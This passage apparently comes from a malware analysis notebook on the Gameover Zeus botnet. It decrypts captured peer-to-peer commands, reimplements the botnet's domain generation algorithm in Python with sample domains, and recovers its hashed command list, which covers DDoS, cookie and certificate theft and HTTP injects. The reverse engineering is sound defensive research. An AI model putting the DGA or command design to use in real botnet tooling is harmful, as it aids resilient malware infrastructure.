tcp_data = binascii.unhexlify("b308385d4d43cbb2dd19072254fa106fc1179f3ea1261757065d1dc6387cff4194768aff56e881983e9a8e9a148f7dcb581145ba83b334c4aeb4ad80619a7644c3246c258c4893731dcd3789e1cb4cb8e6a5cff1b0a8e964fdc9e5ba7c269ef4a96f6031c5")
tcp_data += binascii.unhexlify("4c142df9a0f763fe1acb1b67005e58b84fbd7d3b729cf5b0a5d380ff0eb603b69e467e02c709f8abdc4ad5a4e921103a6820b2e18d66c26192d2330fe048f0223baf86ffc72387d9d0251205621aab7a61ddcff82d569fdf440642d36ea5226c7b39ab460412abe5151975ffcd30")
tcp_data += binascii.unhexlify("853d7acfaad0634bc6a5c38b3520165bb457c8baeb90a98ec3a7be154881b4f630e87efef37c209f02ce74e8413f5048e1af7dfe249ffc790278bb34908530adacd6ec94b3dd3d531e563630027c63e2a7abeb4e56fc909f2e192efd44a9412247e88215b4c3dca109745cebca8252c9b8ebae0b9691498270153c57160567ac2b0c174eec1085853dec616bac07db34eece313618dec1060fc2ebc8aec864a98f06a3e4844b0edb221231a7b7b541ae8e9ddbd13853b67cab33a37c7d98a6d369994737868a5f6ed1e47c3f6c6c5e50b367c0e1587597e315df275ccfbf593a34c2974536bd1c01820890b33b07dec07c32bf77c7b2c4d48d58b1ec107615ecc2e76f88b12994cf180843d3afe131f7f6767371ba0829e03cd11c1c693c89d66050058f668ffc036a24c07c7bc04a38bc0e8c5f1a388317654bb95ed7ff273f56061f2014f14d03ecdeada684862d1309fd102da20efb90d9a543f465044a6e8d4e86abd9ad0d3fee1443feb5d2f68d39fedbd1d93389064b9d17d38b3eef8c9e81c7e634b29013619975dd97e546efe8ee7d8d148e957433a86fc0489ec5e386666f1c3af2595322411d34d61f2f21d07348799b870d0dbc6fa35283e999c7694f2bc93d3a1da13991a7b952415b6e5e0941d072d6236e976da3d7e966b0cf55fd765f12b13798a1e8fcc30f4bb9c22e6de7ae8ba023b397fdb1b86351f38ddc7e1e5f07c896b780907edd10805914d07671b7f548c04ee0f9b90c78e49360056f39548bcc7a0b6f36dc1e7bd0e0248471e26f4ad060f15264081ac013c15bd82ae8d8c15b939d5f4df6d147bf7bb2e9e0a707f42ef382d031fd39265a437c")

plainbuf = decrypt_p2p_command(super_peer_rc4_key, tcp_data)

# header + padding len
command_204 = plainbuf[0:44+57]
plainbuf = plainbuf[44+57:]
command, command_data = parse_p2p_command(command_204)

end_of_http_request = plainbuf.find(b"\r\n\r\n") + 4
http_request = plainbuf[:end_of_http_request].decode()
print("\nhttp_request:\n")
print(http_request)

http_data = plainbuf[end_of_http_request:]

# I don't have gameover's RSA private key to decrypt the data, but similar to the /write version above
print("\nhttp_data:\n")
print(http_data)

field_0=65
field_1=4
padding_length=57
command=204
session_id=b'\xbe\xb4\x00z\xe4\x15\xbb\xb7\x9epv\x80\xebDa\x83+\xd9\x80\xc3'
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b''
padding=b"\x13W\xbaQ\x1327\x7ff\xad/[\x8bH;\x81KV\xdb&1\x90\xee\x92\xbb>\xef\xccDl\xabt\xcd}\xf2\xfb!#\x8d\xcbN\\&\xeb\xd3\xa6\xad\xc1/\xf7\x96'=\x8e\xfb\xd6c"
field_1 != ~session_id[1]: 4 / 75

http_request:

POST /write2 HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 608
X-ID: 5555



http_data:

b'z\x81Np\xbaE\xe9\x94\x12\xdc\x07x\x14\x86\xd44\xedK\xb4f\xf2h\x18\x86>m1\x9dI\x08\x11\xc7g\x14o|O@}l\x8d\xdf\xc7q\xc7~]|F\x1cK@\xa1\xe5\x98\xfe\xb6US\xd3\xeb\xba}\xb4\xebp7\x0b\x92\xcd\xf3a\x97\xc6\x94\xea\xad\\Q\xf3\xa9;\x83\xb1x<\x0c4\xddj\xdf\x1a\xf2#c\x8b ,|\x91\xb8\\%\x83"\xb5\x90/\xf5\x06i;\x91\xe8\x02\xb7\x97\x0c\xdfM\xc7kx\x02\x8d\xdc\xbb\x03KO\xbe[5\xb6\xc4\x9cg\x1b\x03\x84\xca\x81s\xb5\x98o\xf5\xef[\x8e\xa2\xff$\x90\xc6l\xda\xe2\x9b\xc0\xd

## TCP Command 204 with POST /write2 Response

In [25]:
tcp_data = binascii.unhexlify("5303106d118e56bcc5f077a06cd3e2f1c7836783fa320023982931328de193938f6d0eced8076069db695c6ef42dca1467a86b5cfea6a497ef653d5f30202d7f9b8ce0bd47eb3e2477d3a6d342e3f84c31cb62d218c0d8261d86260d45b0761d8a20410262006892a9ced7941ae209b51f61b32d396bb61155865ae4c6f2b36a771e3aeab3776e28f9a7a3ab0034e95d66f41d2667eb067a4d4d30c64b0650f8ae0de9b9fb0536c638dfd12aea945280b6e69a44ff6d058370121e647df7d1941374266a945fabf50e42ea5348a371fc5fccc937f5cd98e5371a064b87a5092c9dded3bcb97ffd81c9520b3d5deb")

plainbuf = decrypt_p2p_command(victim_rc4_key, tcp_data)

end_of_http_response = plainbuf.find(b"\r\n\r\n") + 4
http_response = plainbuf[:end_of_http_response].decode()
print("\nhttp_response:\n")
print(http_response)

i = end_of_http_response
chunk_len = int(plainbuf[i:i+4].strip(), 16)
print(f"\n{chunk_len=}")
i += 4
chunk = plainbuf[i:i+chunk_len]
i += chunk_len
print(f"\n{chunk=}")

end_chunk = plainbuf[i:]
print(f"\n{end_chunk=}")

# I don't have the AES session key to decrypt the data, but similar to the /write version above


http_response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Jun 2014 09:32:53 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive



chunk_len=64

chunk=b'\x99\xff\x97\x1fS[D\xda@E\xaa\xd4\xd1Za\x0b\x99\'b\xc1\xf8\x0f\xa7\x9dV\xb5\xf7\xf0\xdc\xe8o\x19\xc6e\x81\xcb\xae\xa3\xca\xd1\xcd\xdd\x0fv\xc7C\xd0\xbbj\x9b"\xde\xd0\xf0e\x88\xb6I8\xf6l\xec\xf8~'

end_chunk=b'\r\n0\r\n\r\n'


## TCP Command 200 Force Updates

Depending on the `field_1` value, this command could:

- update config
- update binary
- promote to super peer
- update backend endpoint where super peers sent data to

## Super Peer to Backend Endpoint Data Transfer

I wasn't able to find a PCAP that captured the data transfer from a super peer to a backend endpoint. Please reach out if you have one in your archives.

"Gameover Zeus -- Bad Guys and Backends" noted that super peers communicated with "C2 Proxies" that were "plain HTTP proxies" that provided an "additional layer between botnet and backend". My current assumption is that TCP command 200 would configure these C2 proxy endpoints on super peers.

## Domain Generation Algorithm (DGA)

If needed, a backup DGA was used to bootstrap a new P2P peer list.

Pseudocode:

    bool __fastcall get_dga_domain(int dga_domain, SYSTEMTIME *system_time, unsigned int rand_val_1000)
    {   
      bool result; // al
      int len; // eax 
      unsigned __int8 i; // bl
      BYTE *p_hash_val; // ebp 
      unsigned __int8 math1; // cl
      unsigned __int8 math2; // dl
      int i_cp; // eax MAPDST
      int offset_to_dot; // eax 
      unsigned __int8 offset_to_tld; // bl
      _DWORD *p_to_tld; // ecx 
      unsigned __int8 final_dga_len; // bl
      _DWORD len_cp[2]; // [esp+10h] [ebp-28h] BYREF
      BYTE hash_val[32]; // [esp+18h] [ebp-20h] BYREF

      LOBYTE(len_cp[0]) = LOBYTE(system_time->wYear) + 48; 
      BYTE1(len_cp[0]) = system_time->wMonth;
      BYTE2(len_cp[0]) = 7 * (system_time->wDay / 7); 
      *(len_cp + 3) = rand_val_1000;
      result = s_hash_get_hash(0, hash_val, len_cp, 7u);// md5 
      if ( result )
      {   
        len = 16; 
        i = 0;
        len_cp[0] = 16; 
        p_hash_val = hash_val;
        do
        {
          math1 = (*p_hash_val >> 3) + 'a';
          math2 = (*p_hash_val & 0x1F) + 'a';
          if ( math2 != math1 )
          {
            if ( math2 <= 'z' )
            {
              i_cp = i++;
              *(i_cp + dga_domain) = math2;
              len = len_cp[0];
            }
            if ( math1 <= 'z' )
            {
              i_cp = i++;
              *(i_cp + dga_domain) = math1;
              len = len_cp[0];
            }
          }
          ++p_hash_val;
          len_cp[0] = --len;
        }
        while ( len );
        offset_to_dot = i;
        offset_to_tld = i + 1;
        *(offset_to_dot + dga_domain) = '.';
        p_to_tld = (dga_domain + offset_to_tld);
        if ( rand_val_1000 % 6 )
        {
          if ( rand_val_1000 % 5 )
          {
            if ( (rand_val_1000 & 3) != 0 )
            {
              if ( rand_val_1000 % 3 )
              {
                if ( (rand_val_1000 & 1) != 0 )
                  *p_to_tld = 'moc';
                else
                  *p_to_tld = 'ten';
              }
              else
              {
                *p_to_tld = 'gro';
              }
              final_dga_len = offset_to_tld + 3;
            }
            else
            {
              *p_to_tld = 'ofni';
              final_dga_len = offset_to_tld + 4;
            }
          }
          else
          {
            *p_to_tld = 'zib';
            final_dga_len = offset_to_tld + 3;
          }
        }
        else
        {
          *p_to_tld = 'ur';
          final_dga_len = offset_to_tld + 2;
        }
        result = final_dga_len;
        *(final_dga_len + dga_domain) = 0;
      }
      return result;
    }

In [26]:
def get_dga_domain(system_time, rand_val_1000):
    s7 = b"" 
    year = ((dt.year & 0xff) + 48) & 0xff
    s7 += struct.pack("B", year)
    s7 += struct.pack("B", dt.month)
    day = 7 * (dt.day // 7)
    s7 += struct.pack("B", day)
    s7 += struct.pack("I", rand_val_1000)

    md5 = hashlib.md5()
    md5.update(s7)
    hash_val = md5.digest()

    domain = b"" 
    counter = 16
    i = 0 
    while counter > 0:
        math1 = (hash_val[i] >> 3) + ord('a')
        math2 = (hash_val[i] & 0x1f) + ord('a')

        if math2 != math1:
            if math2 <= ord('z'):
                domain += struct.pack("B", math2)

            if math1 <= ord('z'):
                domain += struct.pack("B", math1)

        i += 1
        counter -= 1

    domain += b"."
    if rand_val_1000 % 6:
        if rand_val_1000 % 5:
            if (rand_val_1000 & 3) != 0:
                if rand_val_1000 % 3:
                    if (rand_val_1000 & 1) != 0:
                        domain += b"com"
                    else:
                        domain += b"net"
                else:
                    domain += b"org"
            else:
                domain += b"info"
        else:
            domain += b"biz"
    else:
        domain += b"ru"

    return domain.decode()


dt = datetime.datetime(2014, 5, 28)
print(f'date: {dt.strftime("%Y-%m-%d")}')
# first 30
for i in range(30):
    print(get_dga_domain(dt, i))

date: 2014-05-28
xpbyizrgcmhmayrkozhathupb.ru
ononhaaiibcergijgqzdpnwchyivkj.com
kvgfaxaetdipnrwhmtxoauknxkkz.net
mzgqsjfsuopbfaxgptbxcwhe.org
ptolnpbfydnxobiuwbiwkqxtc.info
skepzgiqwzxlvwgzpcuthij.biz
bijzskjfpdmrbqdeuzwcpbdd.ru
qgyhtstkbuggilovemwvpr.com
hggmnbpdhlscqcphizsfmpf.info
ibxphihqskuoylpzcedfiueivsbq.org
rgvwxhukbapvxzxjmfbuw.biz
hukxvsscbylfcqtdtfupx.com
kzbatdxojfqstvsizswpronwbejn.ru
cdtoqotwifdiwstzldmhhxk.com
knlbxpvfxdrstkrxxgynfdvg.net
qxtuwkvsghwoxorogqinxwqgtl.biz
lrleqcqgyrhucixirwkyhph.info
dqvgbeceydrwlzcembeydoeah.com
ojnvdemaqequghmxwqvinkzwkjfmn.ru
xooriblneatoqshpelvkr.com
pdinrzlnmvkeipaqlqnfgyij.biz
pnwsxytonpleqatxnzgyrk.org
soxpgutodxfaaeovaezlvt.net
zqgtijukozhfeijgqwkrwcebiwo.com
hqwtjrjzlfipcagqdlp.ru
tojizgqzlgifadgmhajztx.biz
wspbxsdminhedbmvkrsedojnflnj.net
hiofbavaefufanzkzqwmrtgtkxoca.org
dvwztkfnjgeleyqgrwtdausuc.info
qcdtobaqhqyxpijtxhqfy.com


The new peer list (formatted similar to the peer list in the BaseConfig) was downloaded via HTTP. Embedded RSA public key \#1 was used to verify the downloaded data.

## Commands

Command names are stored as CRC32 hashes.

Pseudocode:

    ... 
            if ( num_args )
            {   
              command_len = Str::_LengthW(*args);
              if ( command_len > 0 ) 
              {
                command = *args;
                command_crc32 = 0;
                CharLowerW(command);
                s_hash_get_hash(2, &command_crc32, *args, 2 * command_len);// 2 == crc32
                command_index = 0;
                while ( g_command_crc32_array[2 * command_index] != command_crc32 )
                {
                  if ( ++command_index >= 28u )
                    goto LABEL_14;
                }
                command_func = *(&g_command_func_array + 2 * command_index);
                if ( !command_func )
                {
    LABEL_14:
                  v17 = a3; 
                  goto LABEL_15;
                }
                v19 = !command_func(s12h, args, num_args);
    ... 

Disassembly:

    ... 
    .text:00EC1784 0F B7 C5                                      movzx   eax, bp
    .text:00EC1787 39 0C C5 E0 8C E7 00                          cmp     ds:g_command_crc32_array[eax*8], ecx 
    .text:00EC178E 74 44                                         jz      short loc_EC17D4
    .text:00EC1790 6A 1C                                         push    1Ch 
    ... 

In [27]:
commands = [
    "ddos_type",
    "ddos_address",
    "ddos_url",
    "ddos_execute",
    "os_shutdown",
    "os_reboot",
    "bot_uninstall",
    "bot_bc_add",
    "bot_bc_remove",
    "bot_httpinject_disable",
    "bot_httpinject_enable",
    "fs_find_add_keywords",
    "fs_find_execute",
    "fs_pack_path",
    "user_destroy",
    "user_logoff",
    "user_execute",
    "cmd_exfil_firefox_profile_data",
    "user_cookies_get",
    "user_cookies_remove",
    "user_certs_get",
    "user_certs_remove",
    "user_url_block",
    "user_url_unblock",
    "user_homepage_set",
    "user_emailclients_get",
    "user_flashplayer_get",
    "user_flashplayer_remove",
]

known_crc32s = {}
for command in commands:
    crc32 = binascii.crc32(("\x00".join(command) + "\x00").encode())
    known_crc32s[crc32] = command
    
match = re.search(rb'\x39\x0c\xc5(?P<command_crc32_array_addr>[\s\S]{4})[\s\S]{2}\x6a(?P<num_commands>[\s\S])', pe.get_memory_mapped_image())
command_crc32_array_addr = struct.unpack("I", match.group("command_crc32_array_addr"))[0]
num_commands = struct.unpack("B", match.group("num_commands"))[0]

for i in range(num_commands):
    crc32_addr = command_crc32_array_addr + i * 8
    crc32_rva = crc32_addr - pe.OPTIONAL_HEADER.ImageBase
    crc32 = pe.get_dword_at_rva(crc32_rva)
    
    if crc32 in known_crc32s:
        print(f"0x{crc32:08x}: {known_crc32s[crc32]}")

    elif crc32 == 0x7f01475e:
        print(f"0x{crc32:08x}: unknown name (cmd_exfil_firefox_profile_data)")

0xd0085818: ddos_type
0x1325a49d: ddos_address
0x0c957621: ddos_url
0xded15e85: ddos_execute
0x9eac0e76: os_shutdown
0x4d5b4a44: os_reboot
0x4d5d6e7c: bot_uninstall
0x85a14f57: bot_bc_add
0x4cb4634b: bot_bc_remove
0x49b54c48: bot_httpinject_disable
0x488594b0: bot_httpinject_enable
0x360e5d48: fs_find_add_keywords
0x2d77464e: fs_find_execute
0x29aa1dcc: fs_pack_path
0x7bea5fc3: user_destroy
0x4157e596: user_logoff
0x54f62641: user_execute
0x7f01475e: unknown name (cmd_exfil_firefox_profile_data)
0x1fd31773: user_cookies_get
0x951c0aa5: user_cookies_remove
0x29434fd2: user_certs_get
0xd2993462: user_certs_remove
0x118412d9: user_url_block
0xa7741a14: user_url_unblock
0xed860d22: user_homepage_set
0x732eff64: user_emailclients_get
0x307b762b: user_flashplayer_get
0x6a5deef5: user_flashplayer_remove
